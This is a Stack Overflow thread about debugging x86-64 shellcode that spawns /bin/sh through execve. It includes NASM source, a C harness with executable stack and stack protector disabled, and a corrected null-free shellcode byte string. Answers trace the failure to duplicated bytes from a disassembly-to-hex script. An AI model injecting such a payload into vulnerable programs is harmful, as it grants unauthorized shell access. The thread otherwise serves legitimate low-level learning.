JMP unexpected behavior in Shellcode when next(skipped) instruction is a variable definition

Question

Purpose: I was trying to take advantage of RIP-relative addressing in x86-64. Even though the assembly performs as expected on its own, the shellcode does not.

The Problem: In short, this is what I tried:

jmp l1
str1: db "some string"
l1:
   other code
   lea rax, [rel str1]

I used the above pattern at various places. It failed only at certain places and succeeded at others. I tried to play around and could not find any pattern to the failures. When the variable (the str1: db line) is positioned after the instruction accessing it, it never failed (in my observations). However, I want to remove nulls, hence I placed the variable definition before the access.

Debug findings
On debugging, I found that the failed jmp points to an incorrect instruction address. E.g. (in gdb):

(code + 18) jmp [code +27] //jmp pointing incorrectly to in-between 2
(code + 22) ... (this part has label)
(code + 24) some instruction // this is where I intended the jmp
(code + 28) some other instruction

Code: This is sample code; I was trying to spawn an execve shell. It is quite large, so I have marked the position of the culprit JMP.

global _start
section .text
_start: 
    xor rax,rax
    mov rsi,rax
    mov rdi,rsi
    mov rdx,rdi
    mov r8,rdx
    mov rcx,r8
    mov rbx,rcx
    jmp gg //failing (jumping somewhere unintended)
    p2: db "/bin/sh"        
gg:
    xor rax,rax
    lea rdi, [rel p2]
    mov [rdi+7], byte al //null terminating using 0x00 from rax
    mov [rdi+8], rdi
    mov [rdi+16],rax


    lea rsi,[rdi+8]
    lea rdx,[rdi+16]
    mov al,59
    syscall

EDIT:1 Have modified the code to contain the failing instructions

EDIT:2 Shellcode in C that I used.

#include<stdio.h>
#include<string.h>

unsigned char code[] = \
"\x48\x31\xc0\x48\x89\xc6\x48\x89\xf7\x48\x89\xfa\x49\x89\xd0\x4c\x89\xc1\x48\x89\xcb\xeb\x07\x2f\x62\x69\x6e\x2f\x73\x68\x48\x31\x48\x31\xc0\x48\x8d\x3d\xef\xff\xff\xff\x88\x47\x07\x48\x89\x7f\x08\x48\x89\x47\x10\x48\x8d\x77\x08\x48\x8d\x57\x10\xb0\x3b\x0f\x05";
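int main(void)
{
    /* strlen stops at the first NUL byte, so this is only meaningful for NUL-free shellcode */
    printf("Shellcode Length:  %d\n", (int)strlen((const char *)code));

    /* Treat the byte array as a function and call it (needs executable data, e.g. -z execstack) */
    int (*ret)() = (int(*)())code;

    ret();

    return 0;
}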

EDIT 3 I get the hexdump by placing the following code inside a Bash file and running it with the filename as an argument. I took it from ShellStorm.

`for i in $(objdump -d $1 -M intel |grep "^ " |cut -f2); do echo -n '\x'$i; done`

What does the raw machine code look like in a case where it fails? Did just the `jmp rel8` displacement change, or did other bytes change, too? (Use a debugger to examine memory in a live process and edit your question to make this a [mcve].) — Peter Cordes, Dec 23 '17 at 06:43
Also, note that `"/bin/sh"` needs to be zero-terminated for `execve`. This usually means you need to put it last, or you need to modify it at runtime to change a byte after it to a zero. If you have multiple strings, I don't think it gains you anything to jump over each one separately unless you're using the `call` trick to push their address; just group them together into one block. I think in your long sample code, some of them are explicit-length, but I didn't try to read your uncommented code to see how it works. — Peter Cordes, Dec 23 '17 at 06:48
@PeterCordes He modifies the string and adds a nul terminator and other data programmatically later on — Michael Petch, Dec 23 '17 at 08:44
The update to simplify the code makes that much easier to see. That's very close to self-modifying code, but the `[rdi+8]` and `[rdi+16]` stores do avoid modifying any instructions that haven't executed yet. Note that after they execute, the instructions you see in a debugger's disassembly view will be different. It will cause modern CPUs to do a pipeline flush (self-modifying code machine nuke), but performance of this code is unimportant. — Peter Cordes, Dec 23 '17 at 15:53
Anyway, @yuvral you're still saying this code works as a stand-alone executable, but not when used as an exploit payload? Are you sure the target executable isn't modifying stack memory before returning into your machine code? Your code is position-independent, and there's no reason why a `jmp` like that would be any more sensitive to failure than anything else. Or are you looking at disassembly after the stores have already modified the jump target, or is your disassembly getting out of sync because of the non-instruction data? Is the `jmp` still encoded as `eb 07`? — Peter Cordes, Dec 23 '17 at 15:55
@PeterCordes, the jump instruction seems to be at the place it is supposed to be as per gdb; the only catch is that it points to a location where it is not supposed to. This depends on what is placed after the JMP (str: db) and the direction of the JMP. The location where it is supposed to point and where it actually points differ by a minor offset. E.g. the required position would be code + 121, but it instead jumps to code + 127. I can provide the full debug output or the code if you require further insight. — Yuvraj Singh, Dec 27 '17 at 15:23
@YuvrajSingh Have you confirmed that you have properly encoded the exploit payload? Once it is in the target executable, have you verified it matches the instructions byte for byte? I'm almost wondering if you've encoded it improperly, so that once loaded in the target it doesn't run as expected. — Michael Petch, Dec 29 '17 at 07:19
Apologies for the late follow-up, guys, and thanks for the effort put in. I ran uname -a on my Ubuntu 12 machine, and this is what I got: `Linux ubuntu 3.2.0-23-generic #36-Ubuntu SMP Tue Apr 10 20:39:51 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux`. I assembled with `nasm -felf64 -o execShell.o execShell.asm` and then `ld -o execShell.s execShell.asm -N` (-N added to allow the code to rewrite its own memory). The shellcode in C (added in EDIT 2) was compiled using `gcc -fno-stack-protector -z execstack -o relExec.o relExec.c`. The result (relExec.o) gives a segmentation fault when executed. — Yuvraj Singh, Jan 04 '18 at 10:20
If you want to fix the shellcode, you will find `\x48\x31\x48\x31` in the string. It should be just `\x48\x31`. If you fix that, things should be fine, but ultimately I believe the extra bytes duplicated after the data come from the method you used to turn your standalone executable into the shell string. My guess is you took the output of some disassembly program (objdump? something else?), parsed the bytes, and massaged them into a string. — Michael Petch, Jan 05 '18 at 06:42
@MichaelPetch. I took this code from ShellStorm, I did not spend much time investigating how it works, as it did not stump me before in simpler programs. I have pasted the code that I am using for dumping the hex under EDIT 3. Also, thanks for putting forth your way of creating the executable, I am going to follow the same in future. — Yuvraj Singh, Jan 05 '18 at 07:42
The problem is that whatever method ShellStorm is using is incorrect. It's using a method that relies on data (IMHO disassembly output) that may, under certain circumstances, duplicate bytes during the process of jmp synchronization. This is a side effect of mixing code and data. ShellStorm may assume you always have data after the code for the output to be accurate. Effectively, the disassembler was being too smart for what you need. — Michael Petch, Jan 05 '18 at 07:46

Michael Petch · Accepted Answer · 2018-01-05T08:24:00.530

TL;DR: The method you are using to convert your standalone shell code program execShell to a shell code exploit string is buggy.

Based on the information given, I suspect the problem is the way you are using disassembly output to generate the final byte stream that gets converted into your shell code string. The disassembly output was likely confusing and contained duplicated values. While trying to disassemble the data (mixed in with the code), the disassembler output the shortest encodable instruction that finished consuming all the data, then discovered that a JMP target fell inside that instruction and repeated some of the bytes as it backed up to re-synchronize. Whatever process was used to convert the disassembly to binary didn't take this kind of issue into account.

Don't use disassembly output to generate the binary file. Generate your standalone executable with the shell code (I believe execShell is the file in your case) and use tools like objcopy and hexdump to generate the C shell code string:

objcopy -j.text -O binary execShell execShell.bin
hexdump -v -e '"\\""x" 1/1 "%02x" ""' execShell.bin

The objcopy command takes the execShell executable and extracts just the .text section (using the -j.text option) and outputs as binary data to the file execShell.bin. The hexdump command just reformats the binary file and outputs it in a form that can be used in a C string. This process doesn't involve parsing any confusing disassembly output so doesn't suffer the problem you encountered. The output of hexdump should look like:

\x48\x31\xc0\x48\x89\xc6\x48\x89\xf7\x48\x89\xfa\x49\x89\xd0\x4c\x89\xc1\x48\x89\xcb\xeb\x07\x2f\x62\x69\x6e\x2f\x73\x68\x48\x31\xc0\x48\x8d\x3d\xef\xff\xff\xff\x88\x47\x07\x48\x89\x7f\x08\x48\x89\x47\x10\x48\x8d\x77\x08\x48\x8d\x57\x10\xb0\x3b\x0f\x05

This differs slightly from yours which was:

\x48\x31\xc0\x48\x89\xc6\x48\x89\xf7\x48\x89\xfa\x49\x89\xd0\x4c\x89\xc1\x48\x89\xcb\xeb\x07\x2f\x62\x69\x6e\x2f\x73\x68\x48\x31\x48\x31\xc0\x48\x8d\x3d\xef\xff\xff\xff\x88\x47\x07\x48\x89\x7f\x08\x48\x89\x47\x10\x48\x8d\x77\x08\x48\x8d\x57\x10\xb0\x3b\x0f\x05

The difference comes right after the bytes of the string /bin/sh (\x2f\x62\x69\x6e\x2f\x73\x68): your output introduced an extra \x48\x31. The extra 2 bytes in your shell code string are responsible for the code not running as expected in the target executable.

Or build with `nasm -f bin` in the first place, so you don't need `objcopy`. (But then you need a `BITS` directive, or an option to set the target mode to 64-bit). — Peter Cordes, Jan 05 '18 at 09:59

Alexis Wilke · Answer 2 · 2017-12-29T05:54:47.090

I could assemble your code with nasm after changing the // to ;. I did not try to execute it, though.

nasm -f elf64 a.s -o a

Then I could look at the code with:

objdump -d a

And the part of the code you are asking about looks like (i.e. the jmp)

  12:   48 89 cb                mov    %rcx,%rbx
  15:   eb 07                   jmp    1e <gg>

0000000000000017 <p2>:
  17:   2f                      (bad)  
  18:   62                      (bad)  
  19:   69                      .byte 0x69
  1a:   6e                      outsb  %ds:(%rsi),(%dx)
  1b:   2f                      (bad)  
  1c:   73 68                   jae    86 <gg+0x68>

000000000000001e <gg>:
  1e:   48 31 c0                xor    %rax,%rax

However, the following has a few problems:

    mov [rdi+7], byte al ;null terminating using 0x00 from rax
    mov [rdi+8], rdi
    mov [rdi+16],rax

You are attempting to WRITE to READ-ONLY memory. Code can't be modified.
The mov from rdi/rax may not be aligned.
If that code were to succeed, it would overwrite your code at gg:.

Also, it would be a good idea to put an alignment directive just before gg:, something like this:

p2: db "..."
align   16
gg:
   xor rax,rax

And so since the code is read only, you have to put the zeroes in there by hand.

p2: db "..."
    db 0
    db 0, 0, 0, 0, 0, 0, 0, 0
    db 0, 0, 0, 0, 0, 0, 0, 0

If you know it is aligned, dq will work too.

Note, however, that you do not align p2 either, so you cannot be sure (i.e. if your code changes, the alignment is very likely to change too). You would probably want to do:

    align 16
p2: db "..."
    db 0
    dq 0
    dq 0

A final note: the [rel p2] may be quite limited. As far as I know, short relative offsets of this kind are limited to -128 to +127. On my 64-bit processor, though, the instruction uses a 32-bit offset. You may have been running into such a problem, depending on your assembler, if it decided that the target was too far away. In your case, one solution is to put the lea instruction before the jmp over the data. I would imagine that the assembler should generate an error if the offset overflows. Another possibility is that something gets optimized and the jmp doesn't get updated properly.

As a side note, the following is not well optimized:

    xor rax,rax
    mov rsi,rax
    mov rdi,rsi
    mov rdx,rdi
    mov r8,rdx

Using xor for all the registers, or reusing rax each time instead of switching, would work better (more likely to execute in parallel). Right now each instruction depends on the previous one (i.e. before you can copy rsi to rdi, you need to copy rax to rsi; using mov rdi,rax would remove that dependency). I think you would not see any difference in this case, but that's something to keep in mind for good optimization.

With the alignments and adding the zeroes in the code, I get:

0000000000000000 <_start>:
   0:   48 31 c0                xor    %rax,%rax
   3:   48 89 c6                mov    %rax,%rsi
   6:   48 89 f7                mov    %rsi,%rdi
   9:   48 89 fa                mov    %rdi,%rdx
   c:   49 89 d0                mov    %rdx,%r8
   f:   4c 89 c1                mov    %r8,%rcx
  12:   48 89 cb                mov    %rcx,%rbx
  15:   eb 29                   jmp    40 <gg>
  17:   90                      nop
  18:   90                      nop
  19:   90                      nop
  1a:   90                      nop
  1b:   90                      nop
  1c:   90                      nop
  1d:   90                      nop
  1e:   90                      nop
  1f:   90                      nop

0000000000000020 <p2>:
  20:   2f                      (bad)  
  21:   62                      (bad)  
  22:   69 6e 2f 73 68 00 00    imul   $0x6873,0x2f(%rsi),%ebp
        ...
  35:   00 00                   add    %al,(%rax)
  37:   00 90 90 90 90 90       add    %dl,-0x6f6f6f70(%rax)
  3d:   90                      nop
  3e:   90                      nop
  3f:   90                      nop

0000000000000040 <gg>:
  40:   48 31 c0                xor    %rax,%rax
  43:   48 8d 3d d6 ff ff ff    lea    -0x2a(%rip),%rdi        # 20 <p2>
  4a:   48 8d 77 08             lea    0x8(%rdi),%rsi
  4e:   48 8d 57 10             lea    0x10(%rdi),%rdx
  52:   b0 3b                   mov    $0x3b,%al
  54:   0f 05                   syscall

Note that when disassembling, if your data represents an instruction it may end up using bytes from your valid code and thus not show you what you would otherwise expect. i.e. it can end up not finding the destination label. Here we're good, though.

He's having a problem when this code is run as shell code (not standalone). As shell code, this code will be placed on the stack, so he needs to make sure that the stack is marked executable in the target executable. He is overwriting code after it has been executed so that he can avoid placing 0x00 (NUL) bytes in the generated shell code. Unless he's on an OS that forces alignment in userland (not the default for Linux), the unaligned access here should work. — Michael Petch, Dec 29 '17 at 05:46
Ah. The clearing of 17 bytes in code saves him 6 bytes total... may be a good idea for a hacker. — Alexis Wilke, Dec 29 '17 at 05:58
